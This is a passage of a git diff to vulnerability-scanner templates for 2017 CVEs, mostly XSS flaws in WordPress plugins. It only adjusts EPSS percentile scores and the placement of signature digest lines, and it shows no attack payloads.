b/http/cves/2017/CVE-2017-17451.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-17451 cwe-id: CWE-79 epss-score: 0.00178 - epss-percentile: 0.54986 + epss-percentile: 0.54969 cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ec0dbff367bd59c6de0c6828139134b48fd36ba0a453326a77f96c66bbfbec1f022100c2c9eebb63d265f2e73229a8afa8654196feeb0b384a8eb4a341c33df73617aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ec0dbff367bd59c6de0c6828139134b48fd36ba0a453326a77f96c66bbfbec1f022100c2c9eebb63d265f2e73229a8afa8654196feeb0b384a8eb4a341c33df73617aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index 35600f718a..3579dcd4fe 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-17731 cwe-id: CWE-89 epss-score: 0.11468 - epss-percentile: 0.94671 + epss-percentile: 0.94668 cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 406a7bc5a2..be38eb4ec1 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-17736 cwe-id: CWE-425 epss-score: 0.1483 - epss-percentile: 0.95252 + epss-percentile: 0.95248 cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 8c5305a871..f36754c89f 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18024 cwe-id: CWE-79 epss-score: 0.00074 - epss-percentile: 0.3093 + epss-percentile: 0.30874 cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -51,4 +51,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210097927434cd4c4c91a237788ce826208491255065e75200c1fbcfc970a4a030b1022100a34e0ed470183f759c9b6c8984569dcd518dc70910ac668121414e95eb4fee43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210097927434cd4c4c91a237788ce826208491255065e75200c1fbcfc970a4a030b1022100a34e0ed470183f759c9b6c8984569dcd518dc70910ac668121414e95eb4fee43:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index b388a0cfbe..6e7155825f 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18487 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:google_adsense_project:google_adsense:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google AdSense")' condition: and -# digest: 4a0a00473045022100f1a3c5c4b9b7ab20b6dfc74da0599e6591b23867359121b327bfb3f71c2a4bfc02200bd27661bbb7601b14edc80a4ecbfbaf158f73c4f9be2877ec6c85da6286db63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f1a3c5c4b9b7ab20b6dfc74da0599e6591b23867359121b327bfb3f71c2a4bfc02200bd27661bbb7601b14edc80a4ecbfbaf158f73c4f9be2877ec6c85da6286db63:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index 985459ba3e..a5337b336d 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18490 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form Multi by")' condition: and -# digest: 4b0a0048304602210091a9ef790a80049697c82cf5789e80cfcf2c9d407b7e99948ba2b19348d1a2ec0221009743f8c2eb742774ab149b8444f2f1a523c95c63fc88b17f3489061aab002cb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210091a9ef790a80049697c82cf5789e80cfcf2c9d407b7e99948ba2b19348d1a2ec0221009743f8c2eb742774ab149b8444f2f1a523c95c63fc88b17f3489061aab002cb8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index 487e39dee7..cc48c0c4ee 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18491 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form by")' condition: and -# digest: 4b0a00483046022100ea8f481fdacfad623ee3c6e4a1e752384cca1451baa185919ac3719ca16d56b80221009b371584dbf659eabf4790741ef51ee5fe52c27499f4d63d883fa2f780056a71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ea8f481fdacfad623ee3c6e4a1e752384cca1451baa185919ac3719ca16d56b80221009b371584dbf659eabf4790741ef51ee5fe52c27499f4d63d883fa2f780056a71:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index dec4a80167..60aa7d3c66 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18492 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:contact_form_to_db:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Contact Form to DB by")' condition: and -# digest: 4a0a004730450220037f1782275b2a14c2f957fe1f76cf09d0cedb20bc40f12f7c599175be9ef490022100b6463a82d02084bef5bcd03a92bead6f18b4b78a3d7b61d6ea9c1c81405f3a98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220037f1782275b2a14c2f957fe1f76cf09d0cedb20bc40f12f7c599175be9ef490022100b6463a82d02084bef5bcd03a92bead6f18b4b78a3d7b61d6ea9c1c81405f3a98:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index f3a6843498..8d7617243e 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18493 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Admin Page by")' condition: and -# digest: 490a00463044022052354d4cbdfb03bb1a9156468313aaee10f95293ec40c221b039ea3a8e600b4e02207062cf87d50c97275c9be15bd2175b26f29e979ec7d817ed73da49aa76ae5eae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022052354d4cbdfb03bb1a9156468313aaee10f95293ec40c221b039ea3a8e600b4e02207062cf87d50c97275c9be15bd2175b26f29e979ec7d817ed73da49aa76ae5eae:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index 32200b3684..cb40f8b489 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18494 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Search by")' condition: and -# digest: 4a0a00473045022060705d2001a555453e1bdf063f486c574b3a9e0b71acaed440d74ebfe924d0ec022100f505d6dc23c836987df9a5c87e713cde2c07a3e5dd0d34a571867824da76c5e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022060705d2001a555453e1bdf063f486c574b3a9e0b71acaed440d74ebfe924d0ec022100f505d6dc23c836987df9a5c87e713cde2c07a3e5dd0d34a571867824da76c5e5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index 0eb51043f7..360fb674df 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18496 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Htaccess by")' condition: and -# digest: 490a0046304402202b08b70198ef93288f3b4cc4d5c4b483340457932a78d23c9e21d454c6b692000220502c542fc4bc4faafa93e191c00253b54171312955b1b6ec9009ef8f8af3fcf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202b08b70198ef93288f3b4cc4d5c4b483340457932a78d23c9e21d454c6b692000220502c542fc4bc4faafa93e191c00253b54171312955b1b6ec9009ef8f8af3fcf8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index 2b71ef3f0c..9569437f7f 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18500 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61178 + epss-percentile: 0.61153 cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Buttons Pack by")' condition: and -# digest: 4a0a00473045022100c55447e30b68a2b8111d16540dc5160844c12ffe8726c144406b3b38c823c99102204b8b553ec9da4b3742c664ed41b46f90499dd68cc5334892986f723fc3cd100f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100c55447e30b68a2b8111d16540dc5160844c12ffe8726c144406b3b38c823c99102204b8b553ec9da4b3742c664ed41b46f90499dd68cc5334892986f723fc3cd100f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index 999a2d30a6..b3bfdffb79 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18501 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61178 + epss-percentile: 0.61153 cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Login by")' condition: and -# digest: 490a0046304402201aafafe1ad5aafa72708e8fd7ae922423949c9358a52633f8b53ddfddf99c196022003029a40adc43762e9a036b661bafc100c067e1235b44f2d74677e1c77aac223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201aafafe1ad5aafa72708e8fd7ae922423949c9358a52633f8b53ddfddf99c196022003029a40adc43762e9a036b661bafc100c067e1235b44f2d74677e1c77aac223:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index 31fce735ff..2d62d4580f 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18502 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61178 + epss-percentile: 0.61153 cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Subscriber by")' condition: and -# digest: 4a0a00473045022100d9129f431b462610098686edcda83a8d3eab73fec8f364aa30a2115b509f1cee02207133c5fcd23646e5e4b2dc0285510258670880834a7b62d87a0a30b5c29e2d85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d9129f431b462610098686edcda83a8d3eab73fec8f364aa30a2115b509f1cee02207133c5fcd23646e5e4b2dc0285510258670880834a7b62d87a0a30b5c29e2d85:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 329b5f178d..3ee7cc1f30 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18505 cwe-id: CWE-79 epss-score: 0.00163 - epss-percentile: 0.52901 + epss-percentile: 0.52875 cpe: cpe:2.3:a:bestwebsoft:twitter_button:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Twitter Button by")' condition: and -# digest: 4a0a00473045022100850b261279f3c91d3b4a1718e59e50d5bd59531d0a386166ffb30444830e48280220217565b8de0a6e3663c8bc630b019d9b5379877889ae3d6f1138f05c6d46f8ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100850b261279f3c91d3b4a1718e59e50d5bd59531d0a386166ffb30444830e48280220217565b8de0a6e3663c8bc630b019d9b5379877889ae3d6f1138f05c6d46f8ec:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index afe2eaace8..154e55fc85 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18516 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "LinkedIn by BestWebSoft")' condition: and -# digest: 490a0046304402207765c56954033faca6d831ba1ba197e1b2df5198eb11e9c81c2d51ed3cffd5af02207103df0d8ea9cf0ca81ae814f5a72141638d1023b9d319810fc3fcf62617acbc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207765c56954033faca6d831ba1ba197e1b2df5198eb11e9c81c2d51ed3cffd5af02207103df0d8ea9cf0ca81ae814f5a72141638d1023b9d319810fc3fcf62617acbc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index cd66f174f5..47247ade3e 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18517 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pinterest by BestWebSoft")' condition: and -# digest: 4a0a00473045022025162ff33caa6671f8a725881b06bd81954e222551ad84597066908dda33544b022100b20abff626aafd533897ec31773effe3f270145afa92aeab6d4c43586b57b12c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022025162ff33caa6671f8a725881b06bd81954e222551ad84597066908dda33544b022100b20abff626aafd533897ec31773effe3f270145afa92aeab6d4c43586b57b12c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index d5222b6223..edef33325e 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18518 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "SMTP by BestWebSoft")' condition: and -# digest: 4b0a00483046022100ef398ee14a6892d9b7851d67183285aac88d8b3077baf338eaaaa028157ca565022100da878391d6db149a6d4470f5706200c4ead1e350a9baad4f9b57a7e05e081b39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100ef398ee14a6892d9b7851d67183285aac88d8b3077baf338eaaaa028157ca565022100da878391d6db149a6d4470f5706200c4ead1e350a9baad4f9b57a7e05e081b39:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index c8a78fba31..8128e7a241 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18527 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pagination by BestWebSoft")' condition: and -# digest: 4b0a00483046022100d1bcfc64caaa39b9f1b0515498933baf7805646bc2029f31663091b5fc8bede8022100a2a3d4b31f1201f2c96a7dd80fccf9e3610c6ff7e235accb2fc5f7cee53f2289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d1bcfc64caaa39b9f1b0515498933baf7805646bc2029f31663091b5fc8bede8022100a2a3d4b31f1201f2c96a7dd80fccf9e3610c6ff7e235accb2fc5f7cee53f2289:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index 948f2179a6..c11981213a 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18528 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:pdf_\&_print:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and -# digest: 4a0a0047304502201f0db23c3639f18620c6d0fd23c34198cf714fa67d271efe3c9286c89182a64402210098345489e6c67cd29c89ddbb538c6545900ea9d6473efe93eb740e55939a380f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201f0db23c3639f18620c6d0fd23c34198cf714fa67d271efe3c9286c89182a64402210098345489e6c67cd29c89ddbb538c6545900ea9d6473efe93eb740e55939a380f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index be63bfdc3d..448268243a 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18529 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and -# digest: 4a0a0047304502203af0302957f63ee274fae21ee19a548d211f793d8e405bc6a9aea7748ff0e38e022100b6bdc69be159e911e49ff453ddd47a6486a398c9902bcf490b68c8e88bf1e889:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203af0302957f63ee274fae21ee19a548d211f793d8e405bc6a9aea7748ff0e38e022100b6bdc69be159e911e49ff453ddd47a6486a398c9902bcf490b68c8e88bf1e889:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index 1973b0a5fa..226bd68834 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18530 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:rating:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Rating by BestWebSoft")' condition: and -# digest: 4b0a00483046022100bca4c4bd76678f59f4765ac0aa1122c6febc9405d10ccbeca0797d7206de8d4e022100f42732fa9ac011af79d3b55afc36d4b3d6c72470d0499e0d238f14510f670be2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bca4c4bd76678f59f4765ac0aa1122c6febc9405d10ccbeca0797d7206de8d4e022100f42732fa9ac011af79d3b55afc36d4b3d6c72470d0499e0d238f14510f670be2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index 8dcb014230..61f0c01ec2 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18532 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:realty:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Realty by BestWebSoft")' condition: and -# digest: 4a0a004730450220237f31b06c1951e968dd6effcbfb8102239c7b2424a565e33de4fbc808171605022100cfa6dffde9fad6792457584ba1cdf5b52aa056d6d0ef1344ec3ad5ebc3977d72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220237f31b06c1951e968dd6effcbfb8102239c7b2424a565e33de4fbc808171605022100cfa6dffde9fad6792457584ba1cdf5b52aa056d6d0ef1344ec3ad5ebc3977d72:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index e36fd43fdb..7bafb0ec5e 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18536 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cbd8157c58acd039ace983a68da0b3dd7e2b70c769223b30acc5f3f3ddd7146702206c7abbe6289b1c16457a1a5d922e90b62723db020925e812dbad91dcadd25a0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100cbd8157c58acd039ace983a68da0b3dd7e2b70c769223b30acc5f3f3ddd7146702206c7abbe6289b1c16457a1a5d922e90b62723db020925e812dbad91dcadd25a0f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index 1cee3e5cdb..d62eec684c 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18537 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Visitors Online by")' condition: and -# digest: 490a00463044022067211d79d8a7fc445c6ec12e9e5eb2ed886016b494babe723c3b77b911f5539902205e933986fc8d2bef54364c1f7e7927b7656144c9b8bf255b8d58d40e7596730a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022067211d79d8a7fc445c6ec12e9e5eb2ed886016b494babe723c3b77b911f5539902205e933986fc8d2bef54364c1f7e7927b7656144c9b8bf255b8d58d40e7596730a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index c3001f87d6..f8ea7c1db1 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18542 cwe-id: CWE-79 epss-score: 0.00221 - epss-percentile: 0.60087 + epss-percentile: 0.60064 cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -51,4 +51,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and -# digest: 490a00463044022071e2bf293a3c5fe2818356a9922fd237f1583d9ea941aa2536fa65d274d6db9c02203dac53d990c90db5f40cc8f85cc8f3db7094709877707619dfc154f98cf67853:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022071e2bf293a3c5fe2818356a9922fd237f1583d9ea941aa2536fa65d274d6db9c02203dac53d990c90db5f40cc8f85cc8f3db7094709877707619dfc154f98cf67853:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 0a0f91a6df..60de8d1011 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18556 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google Analytics by BestWebSoft")' condition: and -# digest: 490a00463044022033747dbd442510133983598f3b02b4a6efbe87affc0e1cf177ad6eca2d691ade022019f4a1933c3264bfe6102402398b8f1ef8ed7c2beb3cc97d7b4f231cdfc996e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022033747dbd442510133983598f3b02b4a6efbe87affc0e1cf177ad6eca2d691ade022019f4a1933c3264bfe6102402398b8f1ef8ed7c2beb3cc97d7b4f231cdfc996e6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index 09b425dfbb..9d04c333dc 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18557 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.37 + epss-percentile: 0.36961 cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google Maps by BestWebSoft")' condition: and -# digest: 490a0046304402205a9cbf97a74971e3db6e3722bc8b06a00ed280e27712be08b66f70acf2e11ffb022067b294843ced3fcc5e571d20a9c3cc6eed709c3f5237d762b234559ffb156bef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 